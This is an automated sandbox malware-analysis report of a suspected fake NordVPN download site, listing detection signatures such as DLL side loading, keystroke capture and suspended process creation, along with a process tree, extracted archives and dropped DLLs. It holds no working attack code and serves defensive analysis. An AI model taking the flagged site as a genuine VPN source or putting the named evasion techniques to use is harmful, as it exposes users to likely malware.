Windows Analysis Report
https://vpn-get.com/nordvpn

Overview

General Information

Sample URL: https://vpn-get.com/nordvpn
Analysis ID: 756292
Infos:

Detection

Score: 25
Range: 0 - 100
Whitelisted: false
Confidence: 60%

Signatures

DLL side loading technique detected
Creates a DirectInput object (often for capturing keystrokes)
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
PE file contains strange resources
Drops PE files
PE file contains sections with non-standard names
Binary contains a suspicious time stamp
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Creates a process in suspended mode (likely to inject code)

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample searches for specific file, try point organization specific fake files to the analysis machine
  • System is w10x64
  • chrome.exe (PID: 4664 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 3576 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1816,i,5108959396523626248,12215149392874120257,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • unarchiver.exe (PID: 1032 cmdline: C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\NordVPN-10_11.zip MD5: B89F9ADB5A6E465B6EB4575913CD2687)
      • 7za.exe (PID: 5496 cmdline: C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\boe55dv2.gbx" "C:\Users\user\Downloads\NordVPN-10_11.zip MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • unarchiver.exe (PID: 2756 cmdline: C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\NordVPN-7_8.zip MD5: B89F9ADB5A6E465B6EB4575913CD2687)
      • 7za.exe (PID: 5664 cmdline: C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l" "C:\Users\user\Downloads\NordVPN-7_8.zip MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • chrome.exe (PID: 1248 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vpn-get.com/nordvpn MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\GoogleUpdater
Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: Binary string: C:\ahpwc\mc\mc_adobe_sdk_dbginfo_win64_x64_release\mc_config_mp2v.pdb! source: mc_config_mp2v.dll.9.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: lcms.dll.6.dr
Source: Binary string: C:\ahpwc\mc\mc_adobe_sdk_dbginfo_win64_x64_release\mc_dec_spic.pdb source: mc_dec_spic.dll0.6.dr
Source: Binary string: libGLESv2.dll.pdb`1-p1- source: libGLESv2.dll.6.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libinstrument\instrument.pdb source: instrument.dll.6.dr
Source: Binary string: msvcp120.i386.pdb source: msvcp120.dll.6.dr
Source: Binary string: C:\h\workspace\MXF_SDK\LICENSE\MOG_PAY_VERSION\label\vs100_x64\stage\bin\MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.pdb source: MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dll0.6.dr, MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dll.6.dr
Source: Binary string: adbeape.pdb source: adbeape.dll.6.dr, adbeape.dll0.6.dr
Source: Binary string: D:\Projects\WinRAR\build\winrar32\Release\WinRAR.pdb source: WinRAR.exe.6.dr
Source: Binary string: libGLESv2.dll.pdb source: libGLESv2.dll.6.dr
Source: Binary string: C:\h\workspace\MXF_SDK_Modules\LICENSE\MOG_PAY_VERSION\label\vs100_x64\stage\bin\MXF_SDK_Modules_DataIO_1.4.22_vs10.pdb source: MXF_SDK_Modules_DataIO_1.4.22_vs10.dll.9.dr
Source: Binary string: C:\ahpwc\mc\mc_adobe_sdk_dbginfo_win64_x64_release\mc_config_mp2v.pdb source: mc_config_mp2v.dll.9.dr
Source: Binary string: C:\Code\BUILD\channels\Surface\Release\Surface.pdb source: Surface.dll.6.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb* source: lcms.dll.6.dr
Source: Binary string: C:\Code\BUILD\channels\Win32_Font\Release\Win32_Font.pdb source: Win32_Font.dll.6.dr
Source: Binary string: DL100AGM.pdb source: DL100AGM.dll0.6.dr
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo
Source: DL100AGM.dll0.6.drBinary or memory string: DirectDrawCreateEx
Source: setup64.dll.6.drStatic PE information: No import functions for PE file found
Source: mfc100chs.dll0.6.drStatic PE information: No import functions for PE file found
Source: mfc100cht.dll.6.drStatic PE information: No import functions for PE file found
Source: mfc100cht.dll0.6.drStatic PE information: No import functions for PE file found
Source: mfc100chs.dll.6.drStatic PE information: No import functions for PE file found
Source: DL100AGM.dll.6.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
Source: DL100AGM.dll.6.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
Source: mc_demux_dv.dll.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: mfc100chs.dll0.6.drStatic PE information: Section .rsrc
Source: mfc100cht.dll.6.drStatic PE information: Section .rsrc
Source: mfc100cht.dll0.6.drStatic PE information: Section .rsrc
Source: mfc100chs.dll.6.drStatic PE information: Section .rsrc
Source: C:\Windows\SysWOW64\unarchiver.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1816,i,5108959396523626248,12215149392874120257,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vpn-get.com/nordvpn
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\NordVPN-10_11.zip
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\boe55dv2.gbx" "C:\Users\user\Downloads\NordVPN-10_11.zip
Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\NordVPN-7_8.zip
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l" "C:\Users\user\Downloads\NordVPN-7_8.zip
Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_01
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google\GoogleUpdater
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\Downloads\5106b089-c5d4-4c97-b3c3-a943e1aca1aa.tmp
Source: C:\Windows\SysWOW64\unarchiver.exe File created: C:\Users\user\AppData\Local\Temp\unarchiver.log
Source: classification engineClassification label: sus25.evad.win@43/220@0/17
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: jfxwebkit.dll.6.drStatic PE information: section name: .unwante
Source: wget.exe.6.drStatic PE information: section name: /4
Source: wget.exe.6.drStatic PE information: section name: /14
Source: GFSDK_ShadowLib.win64.dll.6.drStatic PE information: section name: text
Source: libGLESv2.dll.6.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll.6.drStatic PE information: section name: .voltbl
Source: GFSDK_ShadowLib.win64.dll0.6.drStatic PE information: section name: text
Source: d3dcompiler_47.dll.6.drStatic PE information: 0x66D23DFC [Fri Aug 30 21:47:40 2024 UTC]
Source: initial sampleStatic PE information: section name: .text entropy: 6.90903234258047
Source: initial sampleStatic PE information: section name: .text entropy: 6.95576372950548
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\nio.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\lcms.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\InterfaceCreation.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\java_crw_demo.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\boost_system.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_mp2m.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_pcm.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_SoundFile2.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\zip.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\MXF_SDK_Modules_DataIO_1.4.22_vs10.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\PlugPlugExternalObject.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mp2v.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mpa.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\Tesselator.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\instrument.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mp4v.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jsoundds.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mp2v.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\net.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InterfaceFunction.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_Modules_DataIO_1.4.22_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\bci.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\adbeape.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\prism_d3d.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GFSDK_ShadowLib.win64.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\setup64.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DL100PDFL.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DL100PDFL.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\SceneContainerCommand.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_enc_mp2sr.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\t2k.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\7z.exe
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\sunec.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\dcpr.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\InterfaceCreation.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mp4v.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_GenericContainer_AVI_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\WinRAR.exe
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\CGRCommand.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\splashscreen.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\boost_system.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DL100AGM.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GroupBuffer.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InstanceContainer.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DL100AGM.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\InterfaceCommand.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\FloatTexture.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_trans_audio_converter.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jfxwebkit.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\boost_system.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mfc100chs.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\FileLoader.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\StyleTransfer.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_demux_dv.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\setup64.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\adbeape.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_UserInput.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\JSONCommand.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\prism_sw.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_SysInfo.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jli.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\XMLDOMCommand.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\mlib_image.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_MotionSet.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jfr.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_TextOut.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_DirectInput.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\prism_common.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\PRM.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\ESM_SaveTextFile.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InterfaceChannel.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_mpa.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\GPUPerfAPIDX11-x64.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_enc_pcm.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\fxplugins.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\Internet.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\libGLESv2.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\CopyImage.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_mux_dv.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\PRM.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_trans_audio_converter.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\msvcp120.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\WindowsAccessBridge.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\MXF_SDK_GenericContainer_AVI_4.5.16_vs10.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jp2native.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_dec_spic.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\ImageStitcher.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_mp4v.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\7z.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mfc100cht.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\wget.exe
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_MatrixInterpolateSet.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_trans_audio_converter.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\deploy.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\j2pcsc.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_dec_spic.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\JAWTAccessBridge.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\glass.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\fontmanager.dll
